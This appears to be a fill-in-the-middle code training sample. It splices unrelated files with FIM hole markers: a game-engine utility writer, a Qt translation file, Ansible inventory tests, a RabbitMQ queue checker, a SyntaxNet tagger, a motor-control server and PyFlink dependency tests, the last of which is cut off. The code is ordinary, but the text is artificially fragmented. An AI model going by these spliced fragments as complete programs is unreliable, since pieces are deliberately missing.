uint16_t numOfRecords = getSourceAddressCount();
int headerLen = numOfRecords * sizeof(uint32_t) + sizeof(igmpv3_group_record);
return (size_t)headerLen;
}
}<|fim▁end|> | case IgmpType_MulticastTracerouteResponse:
msgType = "Multicast Traceroute Response";
break;
|
<|file_name|>Stochastic Utility.py<|end_file_name|><|fim▁begin|>from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color<|fim▁hole|>
class Util(ObjectWriter):
class_name = 'Utility'
static = True
def write_init(self, writer):
pass
actions = make_table(StaticActionWriter, {
1 : 'SetRandomSeedToTimer'
})
conditions = make_table(StaticConditionWriter, {
})
expressions = make_table(StaticExpressionWriter, {
0 : 'IntGenerateRandom',
1 : 'GenerateRandom',
3 : 'Substr',
4 : 'Nearest',
6 : 'ModifyRange',
2 : 'Limit',
13 : 'IntNearest',
15 : 'IntModifyRange',
21 : 'ExpressionCompare',
22 : 'IntExpressionCompare',
23 : 'StrExpressionCompare',
8 : 'EuclideanMod',
12 : 'IntLimit',
24 : 'Approach',
18 : 'IntUberMod',
7 : 'Wave',
9 : 'UberMod',
11 : 'Mirror',
17 : 'IntEuclideanMod',
19 : 'IntInterpolate',
25 : 'IntApproach',
16 : 'IntWave',
10 : 'Interpolate'
})
def get_object():
return Util<|fim▁end|> |
from chowdren.writers.events import (StaticConditionWriter,
StaticActionWriter, StaticExpressionWriter, make_table) |
<|file_name|>Assembly_it.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.0" language="it" sourcelanguage="en">
<context>
<name>AssemblyGui::Workbench</name>
<message>
<location filename="../../Workbench.cpp" line="+50"/>
<source>Assembly</source>
<translation>Assembly</translation>
</message>
</context>
<context><|fim▁hole|> <source>Assembly</source>
<translation>Assembly</translation>
</message>
<message>
<location line="+1"/>
<source>Constraint Axle...</source>
<translation>Vincolo assiale...</translation>
</message>
<message>
<location line="+1"/>
<source>set a axle constraint between two objects</source>
<translation>Imposta un vincolo assiale tra due oggetti</translation>
</message>
</context>
<context>
<name>Workbench</name>
<message>
<source>Assembly</source>
<translation type="obsolete">Assembly</translation>
</message>
</context>
</TS><|fim▁end|> | <name>CmdAssemblyConstraintAxle</name>
<message>
<location filename="../../Command.cpp" line="+42"/> |
<|file_name|>test_inventory.py<|end_file_name|><|fim▁begin|># Copyright 2015 Abhijit Menon-Sen <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.inventory.manager import InventoryManager, split_host_pattern
from ansible.vars.manager import VariableManager
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],<|fim▁hole|> }
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class InventoryDefaultGroup(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)<|fim▁end|> | 'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])], |
<|file_name|>motorctrl.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time
SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576
# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250
<|fim▁hole|> self.serial_port = serialport
self.input_buffer = ""
self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
self.last_command_time = time.time()
self.pcb = ioloop_mod.PeriodicCallback(self.check_data_reveived, COMMAND_GRACE_TIME)
self.pcb.start()
def check_data_reveived(self, *args):
if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
self._setspeeds(0,0)
def _setspeeds(self, m1speed, m2speed):
self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))
@zmqdecorators.method()
def setspeeds(self, resp, m1speed, m2speed):
self.last_command_time = time.time()
#print("Got speeds %s,%s" % (m1speed, m2speed))
self._setspeeds(m1speed, m2speed)
# TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
resp.send("ACK")
def handle_serial_event(self, fd, events):
# Copied from arbus that was thread based
if not self.serial_port.inWaiting():
# Don't try to read if there is no data, instead sleep (yield) a bit
time.sleep(0)
return
data = self.serial_port.read(1)
if len(data) == 0:
return
#print("DEBUG: data=%s" % data)
# Put the data into inpit buffer and check for CRLF
self.input_buffer += data
# Trim prefix NULLs and linebreaks
self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
#print "input_buffer=%s" % repr(self.input_buffer)
if ( len(self.input_buffer) > 1
and self.input_buffer[-2:] == "\r\n"):
# Got a message, parse it (sans the CRLF) and empty the buffer
self.message_received(self.input_buffer[:-2])
self.input_buffer = ""
def message_received(self, message):
#print("DEBUG: msg=%s" % message)
try:
# Currently we have no incoming messages from this board
pass
except Exception as e:
print "message_received exception: Got exception %s" % repr(e)
# Ignore indexerrors, they just mean we could not parse the command
pass
pass
def cleanup(self):
print("Cleanup called")
self._setspeeds(0,0)
def run(self):
print("Starting motorserver")
super(motorserver, self).run()
if __name__ == "__main__":
import serial
import sys,os
port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
instance.run()<|fim▁end|> |
class motorserver(zmqdecorators.service):
def __init__(self, service_name, service_port, serialport):
super(motorserver, self).__init__(service_name, service_port) |
<|file_name|>applicationautoscaling.py<|end_file_name|><|fim▁begin|>"""General-use classes to interact with the ApplicationAutoScaling service through CloudFormation.
See Also:
`AWS developer guide for ApplicationAutoScaling
<https://docs.aws.amazon.com/autoscaling/application/APIReference/Welcome.html>`_
"""
# noinspection PyUnresolvedReferences<|fim▁hole|>from .._raw import applicationautoscaling as _raw
# noinspection PyUnresolvedReferences
from .._raw.applicationautoscaling import *<|fim▁end|> | |
<|file_name|>test_cleanup.py<|end_file_name|><|fim▁begin|>"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software<|fim▁hole|>limitations under the License.
"""
from mpp.models import SQLConcurrencyTestCase
'''
Cleanup sqls
'''
class TestCleanupClass(SQLConcurrencyTestCase):
'''
Cleanup sqls before the next test.
'''<|fim▁end|> | distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and |
<|file_name|>edit.py<|end_file_name|><|fim▁begin|>from zeit.cms.i18n import MessageFactory as _
from zope.cachedescriptors.property import Lazy as cachedproperty
import os.path
import zeit.cms.browser.view
import zeit.cms.content.interfaces
import zeit.cms.interfaces
import zeit.content.image.interfaces
import zeit.content.video.interfaces
import zeit.edit.browser.form
import zeit.edit.browser.landing
import zeit.edit.browser.view
import zeit.newsletter.interfaces<|fim▁hole|>class LandingZoneBase(zeit.edit.browser.landing.LandingZone):
uniqueId = zeit.edit.browser.view.Form('uniqueId')
block_type = 'teaser'
def initialize_block(self):
content = zeit.cms.interfaces.ICMSContent(self.uniqueId)
self.block.reference = content
class GroupLandingZone(LandingZoneBase):
"""Handler to drop objects to the body's landing zone."""
order = 0
class TeaserLandingZone(LandingZoneBase):
"""Handler to drop objects after other objects."""
order = 'after-context'
class Teaser(zeit.cms.browser.view.Base):
@cachedproperty
def metadata(self):
return zeit.cms.content.interfaces.ICommonMetadata(
self.context.reference, None)
@cachedproperty
def image(self):
# XXX copy&paste&tweak of zeit.content.cp.browser.blocks.teaser.Display
content = self.context.reference
if content is None:
return
if zeit.content.video.interfaces.IVideoContent.providedBy(content):
return content.thumbnail
images = zeit.content.image.interfaces.IImages(content, None)
if images is None:
preview = zope.component.queryMultiAdapter(
(content, self.request), name='preview')
if preview:
return self.url(preview)
return
if not images.image:
return
group = images.image
for name in group:
basename, ext = os.path.splitext(name)
if basename.endswith('148x84'):
image = group[name]
return self.url(image, '@@raw')
class Advertisement(zeit.cms.browser.view.Base):
@cachedproperty
def image(self):
if not self.context.image:
return
return self.url(self.context.image, '@@raw')
class GroupTitle(zeit.edit.browser.form.InlineForm):
legend = None
prefix = 'group'
undo_description = _('edit group title')
form_fields = zope.formlib.form.FormFields(
zeit.newsletter.interfaces.IGroup).select('title')
class Empty(object):
def render(self):
return u''<|fim▁end|> | import zope.formlib.form
|
<|file_name|>rabbit_queues.py<|end_file_name|><|fim▁begin|>import requests
from requests.auth import HTTPBasicAuth
def get_data(config):
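# Expected config shape, reconstructed from the lookups below (values are
# illustrative, not defaults):
# {
#     'host': 'http://rabbitmq.example.com:15672',
#     'authentication': {'username': 'monitor', 'password': 'secret'},
#     'queue_sizes': {'my_queue': (50, 5000, 1)},  # (inactive, active, nack) thresholds
# }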
auth = HTTPBasicAuth(config['authentication']['username'], config['authentication']['password'])
resp = requests.get(config['host'] + '/api/queues', auth=auth)
queues = resp.json()
data = {}
for queue in queues:
name = queue['name']
message_stats = queue.get('message_stats', {})
queue_size = queue.get('messages')
ack_rate = (message_stats.get('ack_details') or {}).get('rate')
nack_rate = (message_stats.get('redeliver_details') or {}).get('rate')<|fim▁hole|>
(inactive_threshold, active_threshold, nack_threshold) = (50, 5000, 1)
for qs_name, qs_threshold in config['queue_sizes'].items():
if name.startswith(qs_name):
(inactive_threshold, active_threshold, nack_threshold) = qs_threshold
# Treat missing stats as 0 so the comparisons below are None-safe
# (in Python 3, None < int raises a TypeError).
queue_size = queue_size or 0
ack_rate = ack_rate or 0
nack_rate = nack_rate or 0
data[name + ' queue'] = {
'state': 'FAIL' if (queue_size > inactive_threshold and ack_rate < 2 or queue_size > active_threshold or nack_rate > nack_threshold) else 'OK',
'message': 'size is %d, ack rate is %.2f, nack rate is %.2f' % (queue_size, ack_rate, nack_rate)
}
return data<|fim▁end|> | |
<|file_name|>Application.java<|end_file_name|><|fim▁begin|>package shuaicj.hello.configuration.case04;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
/**
* Spring boot application.
*
* @author shuaicj 2019/10/12
*/
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication.run(Application.class, args);<|fim▁hole|><|fim▁end|> | }
} |
<|file_name|>filters.js<|end_file_name|><|fim▁begin|>var Vue = require('vue')<|fim▁hole|>
function fixFilters() {
// Dynamic filter: resolve another filter by name at runtime and apply it
Vue.filter('apply', function(value, name) {
var filter = this.$options.filters[name] || Vue.options.filters[name]
var args = [value].concat(
[].slice.call(arguments, 2)
)
if (filter) return filter.apply(this, args)
return value
})
}
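// Usage sketch (assuming Vue 1.x template filter syntax; illustrative only):
//   {{ message | apply filterName }}
// resolves `filterName` at render time, checking component-local filters
// before global ones, and falls back to the raw value if none is found.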
module.exports = fixFilters<|fim▁end|> | |
<|file_name|>tagger_transitions.cc<|end_file_name|><|fim▁begin|>/* Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software<|fim▁hole|>distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
// Tagger transition system.
//
// This transition system has one type of actions:
// - The SHIFT action pushes the next input token to the stack and
// advances to the next input token, assigning a part-of-speech tag to the
// token that was shifted.
//
// The transition system operates with parser actions encoded as integers:
// - A SHIFT action is encoded as number starting from 0.
#include <string>
#include "parser_features.h"
#include "parser_state.h"
#include "parser_transitions.h"
#include "sentence_features.h"
#include "shared_store.h"
#include "task_context.h"
#include "term_frequency_map.h"
#include "utils.h"
#include "tensorflow/core/lib/strings/strcat.h"
namespace syntaxnet {
class TaggerTransitionState : public ParserTransitionState {
public:
explicit TaggerTransitionState(const TermFrequencyMap *tag_map,
const TagToCategoryMap *tag_to_category)
: tag_map_(tag_map), tag_to_category_(tag_to_category) {}
explicit TaggerTransitionState(const TaggerTransitionState *state)
: TaggerTransitionState(state->tag_map_, state->tag_to_category_) {
tag_ = state->tag_;
gold_tag_ = state->gold_tag_;
}
// Clones the transition state by returning a new object.
ParserTransitionState *Clone() const override {
return new TaggerTransitionState(this);
}
// Reads gold tags for each token.
void Init(ParserState *state) override {
tag_.resize(state->sentence().token_size(), -1);
gold_tag_.resize(state->sentence().token_size(), -1);
for (int pos = 0; pos < state->sentence().token_size(); ++pos) {
int tag = tag_map_->LookupIndex(state->GetToken(pos).tag(), -1);
gold_tag_[pos] = tag;
}
}
// Returns the tag assigned to a given token.
int Tag(int index) const {
DCHECK_GE(index, 0);
DCHECK_LT(index, tag_.size());
return index == -1 ? -1 : tag_[index];
}
// Sets this tag on the token at index.
void SetTag(int index, int tag) {
DCHECK_GE(index, 0);
DCHECK_LT(index, tag_.size());
tag_[index] = tag;
}
// Returns the gold tag for a given token.
int GoldTag(int index) const {
DCHECK_GE(index, -1);
DCHECK_LT(index, gold_tag_.size());
return index == -1 ? -1 : gold_tag_[index];
}
// Returns the string representation of a POS tag, or an empty string
// if the tag is invalid.
string TagAsString(int tag) const {
if (tag >= 0 && tag < tag_map_->Size()) {
return tag_map_->GetTerm(tag);
}
return "";
}
// Adds transition state specific annotations to the document.
void AddParseToDocument(const ParserState &state, bool rewrite_root_labels,
Sentence *sentence) const override {
for (size_t i = 0; i < tag_.size(); ++i) {
Token *token = sentence->mutable_token(i);
token->set_tag(TagAsString(Tag(i)));
if (tag_to_category_) {
token->set_category(tag_to_category_->GetCategory(token->tag()));
}
}
}
// Whether a parsed token should be considered correct for evaluation.
bool IsTokenCorrect(const ParserState &state, int index) const override {
return GoldTag(index) == Tag(index);
}
// Returns a human readable string representation of this state.
string ToString(const ParserState &state) const override {
string str;
for (int i = state.StackSize(); i > 0; --i) {
const string &word = state.GetToken(state.Stack(i - 1)).word();
if (i != state.StackSize() - 1) str.append(" ");
tensorflow::strings::StrAppend(
&str, word, "[", TagAsString(Tag(state.StackSize() - i)), "]");
}
for (int i = state.Next(); i < state.NumTokens(); ++i) {
tensorflow::strings::StrAppend(&str, " ", state.GetToken(i).word());
}
return str;
}
private:
// Currently assigned POS tags for each token in this sentence.
std::vector<int> tag_;
// Gold POS tags from the input document.
std::vector<int> gold_tag_;
// Tag map used for conversions between integer and string representations
// part of speech tags. Not owned.
const TermFrequencyMap *tag_map_ = nullptr;
// Tag to category map. Not owned.
const TagToCategoryMap *tag_to_category_ = nullptr;
TF_DISALLOW_COPY_AND_ASSIGN(TaggerTransitionState);
};
class TaggerTransitionSystem : public ParserTransitionSystem {
public:
~TaggerTransitionSystem() override { SharedStore::Release(tag_map_); }
// Determines tag map location.
void Setup(TaskContext *context) override {
input_tag_map_ = context->GetInput("tag-map", "text", "");
join_category_to_pos_ = context->GetBoolParameter("join_category_to_pos");
if (!join_category_to_pos_) {
input_tag_to_category_ = context->GetInput("tag-to-category", "text", "");
}
}
// Reads tag map and tag to category map.
void Init(TaskContext *context) override {
const string tag_map_path = TaskContext::InputFile(*input_tag_map_);
tag_map_ = SharedStoreUtils::GetWithDefaultName<TermFrequencyMap>(
tag_map_path, 0, 0);
if (!join_category_to_pos_) {
const string tag_to_category_path =
TaskContext::InputFile(*input_tag_to_category_);
tag_to_category_ =
SharedStoreUtils::GetWithDefaultName<TagToCategoryMap>(
tag_to_category_path);
}
}
// The SHIFT action uses the same value as the corresponding action type.
static ParserAction ShiftAction(int tag) { return tag; }
// The tagger transition system doesn't look at the dependency tree, so it
// allows non-projective trees.
bool AllowsNonProjective() const override { return true; }
// Returns the number of action types.
int NumActionTypes() const override { return 1; }
// Returns the number of possible actions.
int NumActions(int num_labels) const override { return tag_map_->Size(); }
// The default action for a given state is assigning the most frequent tag.
ParserAction GetDefaultAction(const ParserState &state) const override {
return ShiftAction(0);
}
// Returns the next gold action for a given state according to the
// underlying annotated sentence.
ParserAction GetNextGoldAction(const ParserState &state) const override {
if (!state.EndOfInput()) {
return ShiftAction(TransitionState(state).GoldTag(state.Next()));
}
return ShiftAction(0);
}
// Checks if the action is allowed in a given parser state.
bool IsAllowedAction(ParserAction action,
const ParserState &state) const override {
return !state.EndOfInput();
}
// Makes a shift by pushing the next input token on the stack and moving to
// the next position.
void PerformActionWithoutHistory(ParserAction action,
ParserState *state) const override {
DCHECK(!state->EndOfInput());
if (!state->EndOfInput()) {
MutableTransitionState(state)->SetTag(state->Next(), action);
state->Push(state->Next());
state->Advance();
}
}
// We are in a final state when we reached the end of the input and the stack
// is empty.
bool IsFinalState(const ParserState &state) const override {
return state.EndOfInput();
}
// Returns a string representation of a parser action.
string ActionAsString(ParserAction action,
const ParserState &state) const override {
return tensorflow::strings::StrCat("SHIFT(", tag_map_->GetTerm(action),
")");
}
// No state is deterministic in this transition system.
bool IsDeterministicState(const ParserState &state) const override {
return false;
}
// Returns a new transition state to be used to enhance the parser state.
ParserTransitionState *NewTransitionState(bool training_mode) const override {
return new TaggerTransitionState(tag_map_, tag_to_category_);
}
// Downcasts the const ParserTransitionState in ParserState to a const
// TaggerTransitionState.
static const TaggerTransitionState &TransitionState(
const ParserState &state) {
return *static_cast<const TaggerTransitionState *>(
state.transition_state());
}
// Downcasts the ParserTransitionState in ParserState to an
// TaggerTransitionState.
static TaggerTransitionState *MutableTransitionState(ParserState *state) {
return static_cast<TaggerTransitionState *>(
state->mutable_transition_state());
}
// Input for the tag map. Not owned.
TaskInput *input_tag_map_ = nullptr;
// Tag map used for conversions between integer and string representations
// part of speech tags. Owned through SharedStore.
const TermFrequencyMap *tag_map_ = nullptr;
// Input for the tag to category map. Not owned.
TaskInput *input_tag_to_category_ = nullptr;
// Tag to category map. Owned through SharedStore.
const TagToCategoryMap *tag_to_category_ = nullptr;
bool join_category_to_pos_ = false;
};
REGISTER_TRANSITION_SYSTEM("tagger", TaggerTransitionSystem);
// Feature function for retrieving the tag assigned to a token by the tagger
// transition system.
class PredictedTagFeatureFunction
: public BasicParserSentenceFeatureFunction<Tag> {
public:
PredictedTagFeatureFunction() {}
// Gets the TaggerTransitionState from the parser state and reads the assigned
// tag at the focus index. Returns -1 if the focus is not within the sentence.
FeatureValue Compute(const WorkspaceSet &workspaces, const ParserState &state,
int focus, const FeatureVector *result) const override {
if (focus < 0 || focus >= state.sentence().token_size()) return -1;
return static_cast<const TaggerTransitionState *>(state.transition_state())
->Tag(focus);
}
private:
TF_DISALLOW_COPY_AND_ASSIGN(PredictedTagFeatureFunction);
};
REGISTER_PARSER_IDX_FEATURE_FUNCTION("pred-tag", PredictedTagFeatureFunction);
} // namespace syntaxnet<|fim▁end|> | |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>mod test_binary_ops_grad;
mod test_core;
mod test_optimizers;
mod test_tensor_ops_eval;
mod test_tensor_ops_grad;<|fim▁end|> | mod test_array_gen;
mod test_binary_ops_eval; |
<|file_name|>conditions.py<|end_file_name|><|fim▁begin|>'''
A condition
'''
from base import Base
from compares import const
class ComparisonMixin(object):
'''
Compare two values with a comparison utility
    to determine whether a change has validated.
'''
def compare(self, a, b, ctype=None):
'''
compare 'a' against 'b' for a comparison of `ctype`
        by default ctype will compare for an exact match
'''
if ctype is None:
ctype = const.EXACT
# internal importer for core.compares.simple.
Comp = self.get_comparison_class(ctype)
# new class of
comp = Comp(self)
# perform comparison
return comp.match(a,b)
def get_comparison_class(self, compare):
'''
Return the compare class by string
'''
m = __import__('core.compares.simple', fromlist=[compare])
k = getattr(m, compare)
return k
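    # Illustrative usage (assumes core.compares.simple defines a class named by
    # const.EXACT whose match(a, b) tests for equality):
    #
    #   ComparisonMixin().compare('a', 'a')               # -> True
    #   ComparisonMixin().compare('a', 'b', const.EXACT)  # -> False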
class Condition(Base, ComparisonMixin):
'''
    A condition perpetuates changes of an object based upon
rules applied at configuration.
'''
def __init__(self, node, attr, value=None, valid=None):
'''
A condition requires
a node (Node|String|iterable),
the attribute to monitor (String),
        a value to validate the condition against.
        Optionally, a `valid` callback invoked when the condition is met
'''
self.watch = node
self.field = attr
self.target = value
self._valid_cb = valid
def valid(self):
'''
Is this condition valid
'''
vs = self._validate()
for node in vs:
val = vs[node]
if val == False: return False
return True
def get_nodes(self):
'''<|fim▁hole|> return a list of Nodes retrieved from the machine using the
`watch` attr. Each item in the `watch` iterable will be
parsed into a Node type.
'''
if isinstance(self.watch, (tuple, list,) ) is not True:
# create iterable
return [self.watch]
# is iterable
return self.watch
def _validate(self, nodes=None, field=None, ctype=None):
'''
validate the condition against the assigned node.
        Returns a dict mapping each node to its comparison result.
        Provide nodes as a node, a list of nodes or a string for
        network acquisition.
        ctype defines the compare utility to use for validation
'''
nodes = nodes or self.get_nodes()
# attr of the node to inspect
field = field or self.field
# the value to target.
value = self.target
if len(nodes) == 0:
return (False, 'no machine node %s' % self.watch)
        r = {}
for node in nodes:
# current value
v = node.get(field)
c = self.compare(v, value, ctype)
r.update({ node: c })
return r<|fim▁end|> | |
<|file_name|>test_dependency.py<|end_file_name|><|fim▁begin|>################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import os
import shutil
import sys
import unittest
import uuid
from pyflink.pyflink_gateway_server import on_windows
from pyflink.table import DataTypes
from pyflink.table.udf import udf
from pyflink.testing import source_sink_utils
from pyflink.testing.test_case_utils import (PyFlinkBlinkStreamTableTestCase,
PyFlinkBlinkBatchTableTestCase,
PyFlinkStreamTableTestCase,
PyFlinkBatchTableTestCase)
class DependencyTests(object):
def test_add_python_file(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.t_env.add_python_file(python_file_path)
def plus_two(i):
from test_dependency_manage_lib import add_two
return add_two(i)
self.t_env.register_function("add_two", udf(plus_two, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_two(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["3,1", "4,2", "5,3"])
class FlinkStreamDependencyTests(DependencyTests, PyFlinkStreamTableTestCase):
pass
class FlinkBatchDependencyTests(PyFlinkBatchTableTestCase):
def test_add_python_file(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.t_env.add_python_file(python_file_path)
def plus_two(i):<|fim▁hole|> from test_dependency_manage_lib import add_two
return add_two(i)
self.t_env.register_function("add_two", udf(plus_two, DataTypes.BIGINT(),
DataTypes.BIGINT()))
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])\
.select("add_two(a), a")
result = self.collect(t)
self.assertEqual(result, ["3,1", "4,2", "5,3"])
class BlinkBatchDependencyTests(DependencyTests, PyFlinkBlinkBatchTableTestCase):
pass
class BlinkStreamDependencyTests(DependencyTests, PyFlinkBlinkStreamTableTestCase):
def test_set_requirements_without_cached_directory(self):
requirements_txt_path = os.path.join(self.tempdir, str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("cloudpickle==1.2.2")
self.t_env.set_python_requirements(requirements_txt_path)
def check_requirements(i):
import cloudpickle
assert os.path.abspath(cloudpickle.__file__).startswith(
os.environ['_PYTHON_REQUIREMENTS_INSTALL_DIR'])
return i
self.t_env.register_function("check_requirements",
udf(check_requirements, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("check_requirements(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["1,1", "2,2", "3,3"])
def test_set_requirements_with_cached_directory(self):
tmp_dir = self.tempdir
requirements_txt_path = os.path.join(tmp_dir, "requirements_txt_" + str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("python-package1==0.0.0")
requirements_dir_path = os.path.join(tmp_dir, "requirements_dir_" + str(uuid.uuid4()))
os.mkdir(requirements_dir_path)
package_file_name = "python-package1-0.0.0.tar.gz"
with open(os.path.join(requirements_dir_path, package_file_name), 'wb') as f:
import base64
# This base64 data is encoded from a python package file which includes a
# "python_package1" module. The module contains a "plus(a, b)" function.
# The base64 can be recomputed by following code:
